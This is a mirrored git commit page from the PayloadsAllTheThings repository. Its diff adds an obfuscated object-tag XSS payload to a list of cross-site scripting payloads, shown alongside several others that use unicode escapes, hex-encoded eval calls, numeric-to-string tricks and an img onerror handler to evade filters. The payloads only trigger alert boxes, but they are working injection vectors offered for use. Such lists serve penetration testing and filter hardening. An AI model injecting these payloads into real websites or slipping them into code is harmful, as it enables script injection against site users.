1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-05-26 07:56:18 +02:00
This commit is contained in:
Swissky 2021-09-07 10:23:12 +02:00
commit 780d8ba313

View File

@ -191,6 +191,7 @@ Most tools are also suitable for blind XSS attacks:
<script>\u0061lert('22')</script>
<script>eval('\x61lert(\'33\')')</script>
<script>eval(8680439..toString(30))(983801..toString(36))</script> //parseInt("confirm",30) == 8680439 && 8680439..toString(30) == "confirm"
<object/data="jav&#x61;sc&#x72;ipt&#x3a;al&#x65;rt&#x28;23&#x29;">
// Img payload
<img src=x onerror=alert('XSS');>